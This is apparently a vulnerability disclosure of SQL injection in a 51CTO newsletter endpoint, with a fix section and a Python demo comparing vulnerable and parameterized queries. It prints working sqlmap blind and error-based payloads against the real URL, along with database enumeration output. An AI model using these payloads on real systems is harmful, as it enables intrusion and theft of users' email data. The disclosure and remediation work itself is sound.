
SQL injection in a 51CTO endpoint can leak a list of more than 19.4 million email addresses

Author: Anonymous  Published: 2016-03-03 21:27:17


Link: http://newsletter2.51cto.com/new/openStats.php?serial=5629&email=xxxxxxx@gmail.com

Injection point (sqlmap output):

    Parameter: serial (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: serial=5629 AND 2829=2829&email=xxxxxxx@gmail.com

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: serial=5629 AND (SELECT 2347 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(2347=2347,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&email=xxxxxxx@gmail.com
    ---
    [21:13:21] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.2.13, Apache 2.2.15
    back-end DBMS: MySQL 5.0
    [21:13:21] [INFO] fetching database names
    [21:13:21] [INFO] the SQL query used returns 5 entries
    [21:13:21] [INFO] resumed: information_schema
    [21:13:21] [INFO] resumed: ezem
    [21:13:21] [INFO] resumed: mysql
    [21:13:21] [INFO] resumed: test
    [21:13:21] [INFO] resumed: vpopmail
    available databases [5]:
    [*] ezem
    [*] information_schema
    [*] mysql
    [*] test
    [*] vpopmail


Fix:
Filter the parameter: serial is a numeric identifier, so reject any value that is not all digits (or cast it to an integer) before it reaches the query, and pass it to the database as a bound parameter of a prepared statement instead of concatenating request input into the SQL text. Filtering alone is fragile; parameter binding is what removes the injection.
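The following is an added example and not code from the original report or from 51CTO: it models the injectable openStats.php query in Python against an in-memory SQLite table (a stand-in for the MySQL backend), shows the boolean-based blind oracle the first payload exercises, puts the hardened query beside the vulnerable one, and decodes the two hex markers from the error-based payload to show how a value is recovered from a MySQL "Duplicate entry" message. The table, column names, and the error string are constructed assumptions; only the parameter name "serial", the value 5629, the conditions, and the marker literals come from the page.

```python
"""Added example (not from the original report): vulnerable vs. hardened
query construction for the "serial" GET parameter, plus sqlmap-style
error-based extraction. SQLite stands in for MySQL (assumption); the real
table, column names and PHP source are not on the page."""
import re
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the newsletter table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE newsletters (serial INTEGER PRIMARY KEY, subject TEXT)")
    conn.executemany("INSERT INTO newsletters VALUES (?, ?)",
                     [(5629, "Weekly digest"), (5630, "Special offer")])
    return conn


def open_stats_vulnerable(conn: sqlite3.Connection, serial: str) -> int:
    """The bug pattern: the GET value is pasted into the SQL text, so
    'serial=5629 AND 2829=2829' becomes part of the WHERE clause."""
    sql = f"SELECT COUNT(*) FROM newsletters WHERE serial={serial}"
    return conn.execute(sql).fetchone()[0]


def open_stats_hardened(conn: sqlite3.Connection, serial: str) -> int:
    """Type-check first (serial is an integer), then bind it as a parameter
    so the value can never change the structure of the query."""
    if not re.fullmatch(r"[0-9]{1,10}", serial):
        raise ValueError("serial must be a decimal integer")
    row = conn.execute("SELECT COUNT(*) FROM newsletters WHERE serial=?",
                       (int(serial),)).fetchone()
    return row[0]


def hardened_rejects(conn: sqlite3.Connection, serial: str) -> bool:
    """True if the hardened endpoint refuses the value outright."""
    try:
        open_stats_hardened(conn, serial)
    except ValueError:
        return True
    return False


def blind_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind: the attacker appends a condition to the WHERE
    clause and reads its truth value from whether the row still matches.
    The page's payload uses the sanity check '2829=2829'."""
    return open_stats_vulnerable(conn, f"5629 AND {condition}") == 1


# --- error-based extraction -------------------------------------------------
# sqlmap wraps the subquery result in two marker strings so it can find the
# value inside the DBMS error message. These are the hex literals from the
# page's payload: 0x716a716a71 and 0x716b6a6a71.
PREFIX = bytes.fromhex("716a716a71").decode()  # 'qjqjq'
SUFFIX = bytes.fromhex("716b6a6a71").decode()  # 'qkjjq'


def extract_from_error(error_text: str) -> Optional[str]:
    """On MySQL >= 5.0, CONCAT(marker, (subquery), marker, FLOOR(RAND(0)*2))
    grouped by a non-unique key raises 'Duplicate entry ... for key ...',
    and the duplicate value carries the subquery result between the markers."""
    m = re.search(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), error_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true condition :", open_stats_vulnerable(db, "5629 AND 2829=2829"))
    print("vulnerable, false condition:", open_stats_vulnerable(db, "5629 AND 2829=2828"))
    print("blind: row count is 2?     :", blind_oracle(db, "(SELECT COUNT(*) FROM newsletters)=2"))
    print("hardened rejects payload   :", hardened_rejects(db, "5629 AND 2829=2829"))
    # Constructed MySQL error text of the kind the page's payload provokes;
    # ELT(2347=2347,1) evaluates to 1, so '1' sits between the markers.
    print("value leaked in error      :",
          extract_from_error("Duplicate entry 'qjqjq1qkjjq1' for key 'group_key'"))
```

The blind oracle is what sqlmap iterates to read database names one character at a time; the error-based channel is faster because each request returns the value directly in the error text, which is why sqlmap prefers it once it confirms MySQL >= 5.0. The hardened function rejects the payload before any SQL runs, and the bound parameter would keep the query intact even if the regex were loosened.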
